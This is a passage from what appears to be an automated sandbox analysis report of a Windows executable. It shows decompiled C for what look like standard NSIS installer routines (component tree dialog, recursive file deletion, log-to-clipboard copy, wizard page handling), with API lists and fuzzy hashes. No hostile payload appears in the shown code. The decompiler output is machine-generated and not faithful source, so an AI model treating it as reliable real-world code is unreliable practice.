              										_a16 =  !( *0x42ec38) >> 0x00000008 & 1;
              									}
              								}
              								goto L41;
              							}
              							_t289 = _a16;
              							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
              								goto L41;
              							}
              							goto L33;
              						} else {
              							goto L48;
              						}
              					} else {
              						L48:
              						if(_a8 != 0x111) {
              							L56:
              							if(_a8 == 0x200) {
              								SendMessageA(_v8, 0x200, _t315, _t315);
              							}
              							if(_a8 == 0x40b) {
              								_t220 =  *0x42a07c;
              								if(_t220 != _t315) {
              									ImageList_Destroy(_t220);
              								}
              								_t221 =  *0x42a094;
              								if(_t221 != _t315) {
              									GlobalFree(_t221);
              								}
              								 *0x42a07c = _t315;
              								 *0x42a094 = _t315;
              								 *0x42ec80 = _t315;
              							}
              							if(_a8 != 0x40f) {
              								L86:
              								if(_a8 == 0x420 && ( *0x42ec39 & 0x00000001) != 0) {
              									_t316 = (0 | _a16 == 0x00000020) << 3;
              									ShowWindow(_v8, _t316);
              									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
              								}
              								goto L89;
              							} else {
              								E004011EF(_t289, _t315, _t315);
              								if(_a12 != _t315) {
              									E0040140B(8);
              								}
              								if(_a16 == _t315) {
              									L73:
              									E004011EF(_t289, _t315, _t315);
              									_v32 =  *0x42a094;
              									_t196 =  *0x42ec48;
              									_v60 = 0xf030;
              									_v16 = _t315;
              									if( *0x42ec4c <= _t315) {
              										L84:
              										InvalidateRect(_v8, _t315, 1);
              										if( *((intOrPtr*)( *0x42e3fc + 0x10)) != _t315) {
              											E0040473D(0x3ff, 0xfffffffb, E00404755(5));
              										}
              										goto L86;
              									}
              									_t281 = _t196 + 8;
              									do {
              										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
              										if(_t202 != _t315) {
              											_t291 =  *_t281;
              											_v68 = _t202;
              											_v72 = 8;
              											if((_t291 & 0x00000001) != 0) {
              												_v72 = 9;
              												_v56 =  &(_t281[4]);
              												_t281[0] = _t281[0] & 0x000000fe;
              											}
              											if((_t291 & 0x00000040) == 0) {
              												_t206 = (_t291 & 0x00000001) + 1;
              												if((_t291 & 0x00000010) != 0) {
              													_t206 = _t206 + 3;
              												}
              											} else {
              												_t206 = 3;
              											}
              											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
              											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
              											SendMessageA(_v8, 0x110d, _t315,  &_v72);
              										}
              										_v16 = _v16 + 1;
              										_t281 =  &(_t281[0x106]);
              									} while (_v16 <  *0x42ec4c);
              									goto L84;
              								} else {
              									_t282 = E004012E2( *0x42a094);
              									E00401299(_t282);
              									_t217 = 0;
              									_t289 = 0;
              									if(_t282 <= _t315) {
              										L72:
              										SendMessageA(_v12, 0x14e, _t289, _t315);
              										_a16 = _t282;
              										_a8 = 0x420;
              										goto L73;
              									} else {
              										goto L69;
              									}
              									do {
              										L69:
              										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
              											_t289 = _t289 + 1;
              										}
              										_t217 = _t217 + 1;
              									} while (_t217 < _t282);
              									goto L72;
              								}
              							}
              						}
              						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
              							goto L89;
              						} else {
              							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
              							if(_t227 == 0xffffffff) {
              								goto L89;
              							}
              							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
              							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
              								_t283 = 0x20;
              							}
              							E00401299(_t283);
              							SendMessageA(_a4, 0x420, _t315, _t283);
              							_a12 = 1;
              							_a16 = _t315;
              							_a8 = 0x40f;
              							goto L56;
              						}
              					}
              				} else {
              					 *0x42ec80 = _a4;
              					_t285 = 2;
              					_v28 = 0;
              					_v16 = _t285;
              					 *0x42a094 = GlobalAlloc(0x40,  *0x42ec4c << 2);
              					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
              					 *0x42a088 =  *0x42a088 | 0xffffffff;
              					_v24 = _t250;
              					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
              					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
              					 *0x42a07c = _t252;
              					ImageList_AddMasked(_t252, _v24, 0xff00ff);
              					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
              					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
              						SendMessageA(_v8, 0x111b, 0x10, 0);
              					}
              					DeleteObject(_v24);
              					_t286 = 0;
              					do {
              						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
              						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
              							if(_t286 != 0x20) {
              								_v16 = _t315;
              							}
              							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
              						}
              						_t286 = _t286 + 1;
              					} while (_t286 < 0x21);
              					_t317 = _a16;
              					_t287 = _v16;
              					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
              					_push(0x15);
              					E00403E83(_a4);
              					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
              					_push(0x16);
              					E00403E83(_a4);
              					_t318 = 0;
              					_t288 = 0;
              					if( *0x42ec4c <= 0) {
              						L19:
              						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
              						goto L20;
              					} else {
              						_t311 = _v32 + 8;
              						_v24 = _t311;
              						do {
              							_t268 = _t311 + 0x10;
              							if( *_t268 != 0) {
              								_v60 = _t268;
              								_t269 =  *_t311;
              								_t302 = 0x20;
              								_v84 = _t288;
              								_v80 = 0xffff0002;
              								_v76 = 0xd;
              								_v64 = _t302;
              								_v40 = _t318;
              								_v68 = _t269 & _t302;
              								if((_t269 & 0x00000002) == 0) {
              									if((_t269 & 0x00000004) == 0) {
              										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
              									} else {
              										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
              									}
              								} else {
              									_v76 = 0x4d;
              									_v44 = 1;
              									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
              									_v28 = 1;
              									 *( *0x42a094 + _t318 * 4) = _t274;
              									_t288 =  *( *0x42a094 + _t318 * 4);
              								}
              							}
              							_t318 = _t318 + 1;
              							_t311 = _v24 + 0x418;
              							_v24 = _t311;
              						} while (_t318 <  *0x42ec4c);
              						if(_v28 != 0) {
              							L20:
              							if(_v16 != 0) {
              								E00403EB8(_v8);
              								_t280 = _v32;
              								_t315 = 0;
              								goto L23;
              							} else {
              								ShowWindow(_v12, 5);
              								E00403EB8(_v12);
              								L89:
              								return E00403EEA(_a8, _a12, _a16);
              							}
              						}
              						goto L19;
              					}
              				}
              			}

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
              • String ID: $M$N
              • API String ID: 1638840714-813528018
              • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
              • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
              • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
              • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
              				signed int _v8;
              				signed int _v12;
              				struct _WIN32_FIND_DATAA _v332;
              				signed int _t37;
              				char* _t49;
              				signed int _t52;
              				signed int _t55;
              				signed int _t61;
              				signed int _t63;
              				void* _t65;
              				signed int _t68;
              				CHAR* _t70;
              				CHAR* _t72;
              				char* _t75;
              
              				_t72 = _a4;
              				_t37 = E0040579B(__eflags, _t72);
              				_v12 = _t37;
              				if((_a8 & 0x00000008) != 0) {
              					_t63 = DeleteFileA(_t72);
              					asm("sbb eax, eax");
              					_t65 =  ~_t63 + 1;
              					 *0x42eca8 =  *0x42eca8 + _t65;
              					return _t65;
              				}
              				_t68 = _a8 & 0x00000001;
              				__eflags = _t68;
              				_v8 = _t68;
              				if(_t68 == 0) {
              					L5:
              					E00405BC7(0x42b0a8, _t72);
              					__eflags = _t68;
              					if(_t68 == 0) {
              						E00405701(_t72);
              					} else {
              						lstrcatA(0x42b0a8, "\*.*");
              					}
              					__eflags =  *_t72;
              					if( *_t72 != 0) {
              						L10:
              						lstrcatA(_t72, 0x409010);
              						L11:
              						_t70 =  &(_t72[lstrlenA(_t72)]);
              						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
              						__eflags = _t37 - 0xffffffff;
              						_a4 = _t37;
              						if(_t37 == 0xffffffff) {
              							L29:
              							__eflags = _v8;
              							if(_v8 != 0) {
              								_t31 = _t70 - 1;
              								 *_t31 =  *(_t70 - 1) & 0x00000000;
              								__eflags =  *_t31;
              							}
              							goto L31;
              						} else {
              							goto L12;
              						}
              						do {
              							L12:
              							_t75 =  &(_v332.cFileName);
              							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
              							__eflags =  *_t49;
              							if( *_t49 != 0) {
              								__eflags = _v332.cAlternateFileName;
              								if(_v332.cAlternateFileName != 0) {
              									_t75 =  &(_v332.cAlternateFileName);
              								}
              							}
              							__eflags =  *_t75 - 0x2e;
              							if( *_t75 != 0x2e) {
              								L19:
              								E00405BC7(_t70, _t75);
              								__eflags = _v332.dwFileAttributes & 0x00000010;
              								if((_v332.dwFileAttributes & 0x00000010) == 0) {
              									E0040587F(_t72);
              									_t52 = DeleteFileA(_t72);
              									__eflags = _t52;
              									if(_t52 != 0) {
              										E00404EB3(0xfffffff2, _t72);
              									} else {
              										__eflags = _a8 & 0x00000004;
              										if((_a8 & 0x00000004) == 0) {
              											 *0x42eca8 =  *0x42eca8 + 1;
              										} else {
              											E00404EB3(0xfffffff1, _t72);
              											E00405915(__eflags, _t72, 0);
              										}
              									}
              								} else {
              									__eflags = (_a8 & 0x00000003) - 3;
              									if(__eflags == 0) {
              										E004054EC(_t70, __eflags, _t72, _a8);
              									}
              								}
              								goto L27;
              							}
              							_t61 =  *((intOrPtr*)(_t75 + 1));
              							__eflags = _t61;
              							if(_t61 == 0) {
              								goto L27;
              							}
              							__eflags = _t61 - 0x2e;
              							if(_t61 != 0x2e) {
              								goto L19;
              							}
              							__eflags =  *((char*)(_t75 + 2));
              							if( *((char*)(_t75 + 2)) == 0) {
              								goto L27;
              							}
              							goto L19;
              							L27:
              							_t55 = FindNextFileA(_a4,  &_v332);
              							__eflags = _t55;
              						} while (_t55 != 0);
              						_t37 = FindClose(_a4);
              						goto L29;
              					}
              					__eflags =  *0x42b0a8 - 0x5c;
              					if( *0x42b0a8 != 0x5c) {
              						goto L11;
              					}
              					goto L10;
              				} else {
              					__eflags = _t37;
              					if(_t37 == 0) {
              						L31:
              						__eflags = _v8;
              						if(_v8 == 0) {
              							L39:
              							return _t37;
              						}
              						__eflags = _v12;
              						if(_v12 != 0) {
              							_t37 = E00405EC2(_t72);
              							__eflags = _t37;
              							if(_t37 == 0) {
              								goto L39;
              							}
              							E004056BA(_t72);
              							E0040587F(_t72);
              							_t37 = RemoveDirectoryA(_t72);
              							__eflags = _t37;
              							if(_t37 != 0) {
              								return E00404EB3(0xffffffe5, _t72);
              							}
              							__eflags = _a8 & 0x00000004;
              							if((_a8 & 0x00000004) == 0) {
              								goto L33;
              							}
              							E00404EB3(0xfffffff1, _t72);
              							return E00405915(__eflags, _t72, 0);
              						}
              						L33:
              						 *0x42eca8 =  *0x42eca8 + 1;
              						return _t37;
              					}
              					__eflags = _a8 & 0x00000002;
              					if((_a8 & 0x00000002) == 0) {
              						goto L31;
              					}
              					goto L5;
              				}
              			}

              APIs
              • DeleteFileA.KERNEL32(?,?,00435400,?), ref: 0040550A
              • lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,00435400,?), ref: 00405554
              • lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,00435400,?), ref: 00405575
              • lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,00435400,?), ref: 0040557B
              • FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,00435400,?), ref: 0040558C
              • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
              • FindClose.KERNEL32(?), ref: 0040564F
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
              • String ID: \*.*
              • API String ID: 2035342205-1173974218
              • Opcode ID: 40143870f9552ccee50e4944eef29081e6212fcf3057c5d2d5961ee8f08c50da
              • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
              • Opcode Fuzzy Hash: 40143870f9552ccee50e4944eef29081e6212fcf3057c5d2d5961ee8f08c50da
              • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 95%
              			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
              				struct HWND__* _v8;
              				long _v12;
              				struct tagRECT _v28;
              				void* _v36;
              				signed int _v40;
              				int _v44;
              				int _v48;
              				signed int _v52;
              				int _v56;
              				void* _v60;
              				void* _v68;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				long _t87;
              				unsigned int _t92;
              				int _t94;
              				int _t95;
              				void* _t101;
              				intOrPtr _t123;
              				struct HWND__* _t127;
              				int _t149;
              				int _t150;
              				struct HWND__* _t154;
              				struct HWND__* _t158;
              				struct HMENU__* _t160;
              				long _t162;
              				void* _t163;
              				short* _t164;
              
              				_t154 =  *0x42e404;
              				_t149 = 0;
              				_v8 = _t154;
              				if(_a8 != 0x110) {
              					if(_a8 == 0x405) {
              						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
              					}
              					if(_a8 != 0x111) {
              						L17:
              						if(_a8 != 0x404) {
              							L25:
              							if(_a8 != 0x7b || _a12 != _t154) {
              								goto L20;
              							} else {
              								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
              								_a8 = _t87;
              								if(_t87 <= _t149) {
              									L37:
              									return 0;
              								}
              								_t160 = CreatePopupMenu();
              								AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
              								_t92 = _a16;
              								if(_t92 != 0xffffffff) {
              									_t150 = _t92;
              									_t94 = _t92 >> 0x10;
              								} else {
              									GetWindowRect(_t154,  &_v28);
              									_t150 = _v28.left;
              									_t94 = _v28.top;
              								}
              								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
              								_t162 = 1;
              								if(_t95 == 1) {
              									_v60 = _t149;
              									_v48 = 0x42a0a0;
              									_v44 = 0xfff;
              									_a4 = _a8;
              									do {
              										_a4 = _a4 - 1;
              										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
              									} while (_a4 != _t149);
              									OpenClipboard(_t149);
              									EmptyClipboard();
              									_t101 = GlobalAlloc(0x42, _t162);
              									_a4 = _t101;
              									_t163 = GlobalLock(_t101);
              									do {
              										_v48 = _t163;
              										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
              										 *_t164 = 0xa0d;
              										_t163 = _t164 + 2;
              										_t149 = _t149 + 1;
              									} while (_t149 < _a8);
              									GlobalUnlock(_a4);
              									SetClipboardData(1, _a4);
              									CloseClipboard();
              								}
              								goto L37;
              							}
              						}
              						if( *0x42e3ec == _t149) {
              							ShowWindow( *0x42ec28, 8);
              							if( *0x42ecac == _t149) {
              								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
              							}
              							E00403E5C(1);
              							goto L25;
              						}
              						 *0x429468 = 2;
              						E00403E5C(0x78);
              						goto L20;
              					} else {
              						if(_a12 != 0x403) {
              							L20:
              							return E00403EEA(_a8, _a12, _a16);
              						}
              						ShowWindow( *0x42e3f0, _t149);
              						ShowWindow(_t154, 8);
              						E00403EB8(_t154);
              						goto L17;
              					}
              				}
              				_v52 = _v52 | 0xffffffff;
              				_v40 = _v40 | 0xffffffff;
              				_v60 = 2;
              				_v56 = 0;
              				_v48 = 0;
              				_v44 = 0;
              				asm("stosd");
              				asm("stosd");
              				_t123 =  *0x42ec30;
              				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
              				_a12 =  *((intOrPtr*)(_t123 + 0x60));
              				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
              				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
              				_t127 = GetDlgItem(_a4, 0x3f8);
              				 *0x42e404 = _t127;
              				_v8 = _t127;
              				E00403EB8( *0x42e3f0);
              				 *0x42e3f4 = E00404755(4);
              				 *0x42e40c = 0;
              				GetClientRect(_v8,  &_v28);
              				_v52 = _v28.right - GetSystemMetrics(0x15);
              				SendMessageA(_v8, 0x101b, 0,  &_v60);
              				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
              				if(_a8 >= 0) {
              					SendMessageA(_v8, 0x1001, 0, _a8);
              					SendMessageA(_v8, 0x1026, 0, _a8);
              				}
              				if(_a12 >= _t149) {
              					SendMessageA(_v8, 0x1024, _t149, _a12);
              				}
              				_push( *((intOrPtr*)(_a16 + 0x30)));
              				_push(0x1b);
              				E00403E83(_a4);
              				if(( *0x42ec38 & 0x00000003) != 0) {
              					ShowWindow( *0x42e3f0, _t149);
              					if(( *0x42ec38 & 0x00000002) != 0) {
              						 *0x42e3f0 = _t149;
              					} else {
              						ShowWindow(_v8, 8);
              					}
              					E00403EB8( *0x42e3e8);
              				}
              				_t158 = GetDlgItem(_a4, 0x3ec);
              				SendMessageA(_t158, 0x401, _t149, 0x75300000);
              				if(( *0x42ec38 & 0x00000004) != 0) {
              					SendMessageA(_t158, 0x409, _t149, _a12);
              					SendMessageA(_t158, 0x2001, _t149, _a8);
              				}
              				goto L37;
              			}

































              APIs
              • GetDlgItem.USER32(?,00000403), ref: 00405050
              • GetDlgItem.USER32(?,000003EE), ref: 0040505F
              • GetClientRect.USER32 ref: 0040509C
              • GetSystemMetrics.USER32 ref: 004050A4
              • SendMessageA.USER32 ref: 004050C5
              • SendMessageA.USER32 ref: 004050D6
              • SendMessageA.USER32 ref: 004050E9
              • SendMessageA.USER32 ref: 004050F7
              • SendMessageA.USER32 ref: 0040510A
              • ShowWindow.USER32(00000000,?), ref: 0040512C
              • ShowWindow.USER32(?,00000008), ref: 00405140
              • GetDlgItem.USER32(?,000003EC), ref: 00405161
              • SendMessageA.USER32 ref: 00405171
              • SendMessageA.USER32 ref: 0040518A
              • SendMessageA.USER32 ref: 00405196
              • GetDlgItem.USER32(?,000003F8), ref: 0040506E
                • Part of subcall function 00403EB8: SendMessageA.USER32 ref: 00403EC6
              • GetDlgItem.USER32(?,000003EC), ref: 004051B3
              • CreateThread.KERNEL32(00000000,00000000,Function_00004F85,00000000), ref: 004051C1
              • CloseHandle.KERNEL32(00000000), ref: 004051C8
              • ShowWindow.USER32(00000000), ref: 004051EC
              • ShowWindow.USER32(?,00000008), ref: 004051F1
              • ShowWindow.USER32(00000008), ref: 00405238
              • SendMessageA.USER32 ref: 0040526A
              • CreatePopupMenu.USER32 ref: 0040527B
              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405290
              • GetWindowRect.USER32 ref: 004052A3
              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
              • SendMessageA.USER32 ref: 00405302
              • OpenClipboard.USER32(00000000), ref: 00405312
              • EmptyClipboard.USER32 ref: 00405318
              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
              • GlobalLock.KERNEL32 ref: 0040532B
              • SendMessageA.USER32 ref: 0040533F
              • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
              • SetClipboardData.USER32 ref: 00405362
              • CloseClipboard.USER32 ref: 00405368
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
              • String ID: {
              • API String ID: 590372296-366298937
              • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
              • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
              • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
              • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 83%
              			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
              				struct HWND__* _v32;
              				void* _v84;
              				void* _v88;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t35;
              				signed int _t37;
              				signed int _t39;
              				struct HWND__* _t49;
              				signed int _t67;
              				struct HWND__* _t73;
              				signed int _t86;
              				struct HWND__* _t91;
              				signed int _t99;
              				int _t103;
              				signed int _t115;
              				signed int _t116;
              				int _t117;
              				signed int _t122;
              				struct HWND__* _t125;
              				struct HWND__* _t126;
              				int _t127;
              				long _t130;
              				int _t132;
              				int _t133;
              				void* _t134;
              
              				_t115 = _a8;
              				if(_t115 == 0x110 || _t115 == 0x408) {
              					_t35 = _a12;
              					_t125 = _a4;
              					__eflags = _t115 - 0x110;
              					 *0x42a084 = _t35;
              					if(_t115 == 0x110) {
              						 *0x42ec28 = _t125;
              						 *0x42a098 = GetDlgItem(_t125, 1);
              						_t91 = GetDlgItem(_t125, 2);
              						_push(0xffffffff);
              						_push(0x1c);
              						 *0x429060 = _t91;
              						E00403E83(_t125);
              						SetClassLongA(_t125, 0xfffffff2,  *0x42e408);
              						 *0x42e3ec = E0040140B(4);
              						_t35 = 1;
              						__eflags = 1;
              						 *0x42a084 = 1;
              					}
              					_t122 =  *0x4091ac; // 0xffffffff
              					_t133 = 0;
              					_t130 = (_t122 << 6) +  *0x42ec40;
              					__eflags = _t122;
              					if(_t122 < 0) {
              						L34:
              						E00403ECF(0x40b);
              						while(1) {
              							_t37 =  *0x42a084;
              							 *0x4091ac =  *0x4091ac + _t37;
              							_t130 = _t130 + (_t37 << 6);
              							_t39 =  *0x4091ac; // 0xffffffff
              							__eflags = _t39 -  *0x42ec44;
              							if(_t39 ==  *0x42ec44) {
              								E0040140B(1);
              							}
              							__eflags =  *0x42e3ec - _t133;
              							if( *0x42e3ec != _t133) {
              								break;
              							}
              							__eflags =  *0x4091ac -  *0x42ec44; // 0xffffffff
              							if(__eflags >= 0) {
              								break;
              							}
              							_t116 =  *(_t130 + 0x14);
              							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
              							_push( *((intOrPtr*)(_t130 + 0x20)));
              							_push(0xfffffc19);
              							E00403E83(_t125);
              							_push( *((intOrPtr*)(_t130 + 0x1c)));
              							_push(0xfffffc1b);
              							E00403E83(_t125);
              							_push( *((intOrPtr*)(_t130 + 0x28)));
              							_push(0xfffffc1a);
              							E00403E83(_t125);
              							_t49 = GetDlgItem(_t125, 3);
              							__eflags =  *0x42ecac - _t133;
              							_v32 = _t49;
              							if( *0x42ecac != _t133) {
              								_t116 = _t116 & 0x0000fefd | 0x00000004;
              								__eflags = _t116;
              							}
              							ShowWindow(_t49, _t116 & 0x00000008);
              							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
              							E00403EA5(_t116 & 0x00000002);
              							_t117 = _t116 & 0x00000004;
              							EnableWindow( *0x429060, _t117);
              							__eflags = _t117 - _t133;
              							if(_t117 == _t133) {
              								_push(1);
              							} else {
              								_push(_t133);
              							}
              							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
              							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
              							__eflags =  *0x42ecac - _t133;
              							if( *0x42ecac == _t133) {
              								_push( *0x42a098);
              							} else {
              								SendMessageA(_t125, 0x401, 2, _t133);
              								_push( *0x429060);
              							}
              							E00403EB8();
              							E00405BC7(0x42a0a0, 0x42e420);
              							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
              							SetWindowTextA(_t125, 0x42a0a0);
              							_push(_t133);
              							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
              							__eflags = _t67;
              							if(_t67 != 0) {
              								continue;
              							} else {
              								__eflags =  *_t130 - _t133;
              								if( *_t130 == _t133) {
              									continue;
              								}
              								__eflags =  *(_t130 + 4) - 5;
              								if( *(_t130 + 4) != 5) {
              									DestroyWindow( *0x42e3f8);
              									 *0x429870 = _t130;
              									__eflags =  *_t130 - _t133;
              									if( *_t130 <= _t133) {
              										goto L58;
              									}
              									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
              									__eflags = _t73 - _t133;
              									 *0x42e3f8 = _t73;
              									if(_t73 == _t133) {
              										goto L58;
              									}
              									_push( *((intOrPtr*)(_t130 + 0x2c)));
              									_push(6);
              									E00403E83(_t73);
              									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
              									ScreenToClient(_t125, _t134 + 0x10);
              									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
              									_push(_t133);
              									E00401389( *((intOrPtr*)(_t130 + 0xc)));
              									__eflags =  *0x42e3ec - _t133;
              									if( *0x42e3ec != _t133) {
              										goto L61;
              									}
              									ShowWindow( *0x42e3f8, 8);
              									E00403ECF(0x405);
              									goto L58;
              								}
              								__eflags =  *0x42ecac - _t133;
              								if( *0x42ecac != _t133) {
              									goto L61;
              								}
              								__eflags =  *0x42eca0 - _t133;
              								if( *0x42eca0 != _t133) {
              									continue;
              								}
              								goto L61;
              							}
              						}
              						DestroyWindow( *0x42e3f8);
              						 *0x42ec28 = _t133;
              						EndDialog(_t125,  *0x429468);
              						goto L58;
              					} else {
              						__eflags = _t35 - 1;
              						if(_t35 != 1) {
              							L33:
              							__eflags =  *_t130 - _t133;
              							if( *_t130 == _t133) {
              								goto L61;
              							}
              							goto L34;
              						}
              						_push(0);
              						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
              						__eflags = _t86;
              						if(_t86 == 0) {
              							goto L33;
              						}
              						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
              						__eflags =  *0x42e3ec;
              						return 0 |  *0x42e3ec == 0x00000000;
              					}
              				} else {
              					_t125 = _a4;
              					_t133 = 0;
              					if(_t115 == 0x47) {
              						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
              					}
              					if(_t115 == 5) {
              						asm("sbb eax, eax");
              						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
              					}
              					if(_t115 != 0x40d) {
              						__eflags = _t115 - 0x11;
              						if(_t115 != 0x11) {
              							__eflags = _t115 - 0x111;
              							if(_t115 != 0x111) {
              								L26:
              								return E00403EEA(_t115, _a12, _a16);
              							}
              							_t132 = _a12 & 0x0000ffff;
              							_t126 = GetDlgItem(_t125, _t132);
              							__eflags = _t126 - _t133;
              							if(_t126 == _t133) {
              								L13:
              								__eflags = _t132 - 1;
              								if(_t132 != 1) {
              									__eflags = _t132 - 3;
              									if(_t132 != 3) {
              										_t127 = 2;
              										__eflags = _t132 - _t127;
              										if(_t132 != _t127) {
              											L25:
              											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
              											goto L26;
              										}
              										__eflags =  *0x42ecac - _t133;
              										if( *0x42ecac == _t133) {
              											_t99 = E0040140B(3);
